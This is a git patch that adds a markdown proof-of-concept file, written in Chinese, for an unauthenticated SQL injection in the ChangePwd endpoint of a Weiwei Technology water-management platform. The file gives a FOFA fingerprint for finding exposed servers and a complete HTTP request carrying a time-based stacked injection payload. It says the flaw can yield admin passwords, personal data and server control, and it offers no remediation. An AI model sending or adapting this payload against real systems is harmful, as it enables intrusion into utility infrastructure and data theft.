From bf0b3a2cd3d54c800ea421d83c9ebfaebddd0cec Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sun, 14 Apr 2024 19:19:43 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E6=BD=8D=E5=BE=AE=E7=A7=91=E6=8A=80-?= =?UTF-8?q?=E6=B0=B4=E5=8A=A1=E4=BF=A1=E6=81=AF=E7=AE=A1=E7=90=86=E5=B9=B3?= =?UTF-8?q?=E5=8F=B0ChangePwd=E6=8E=A5=E5=8F=A3=E5=AD=98=E5=9C=A8SQL?= =?UTF-8?q?=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...务信息管理平台ChangePwd接口存在SQL注入漏洞.md | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 潍微科技-水务信息管理平台ChangePwd接口存在SQL注入漏洞.md diff --git a/潍微科技-水务信息管理平台ChangePwd接口存在SQL注入漏洞.md b/潍微科技-水务信息管理平台ChangePwd接口存在SQL注入漏洞.md new file mode 100644 index 0000000..89e4ee8 --- /dev/null +++ b/潍微科技-水务信息管理平台ChangePwd接口存在SQL注入漏洞.md @@ -0,0 +1,20 @@ +## 潍微科技-水务信息管理平台ChangePwd接口存在SQL注入漏洞 + +潍微科技-水务信息管理平台 ChangePwd 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。 + +## fofa +``` +icon_hash="-491165370" +``` + + +## poc +``` +GET /Account/ChangePwd?oldpwd=123456&newpwd=123456&conpwd=123456&account=1%27;waitfor%20delay%20%270:0:5%27--+ HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 +Accept-Encoding: gzip, deflate, br +Connection: close +``` + +![a6fd2eeb352ff857001c3613ec992f16](https://github.com/wy876/POC/assets/139549762/db189bee-4a6a-4159-a39f-c07c138e0c59)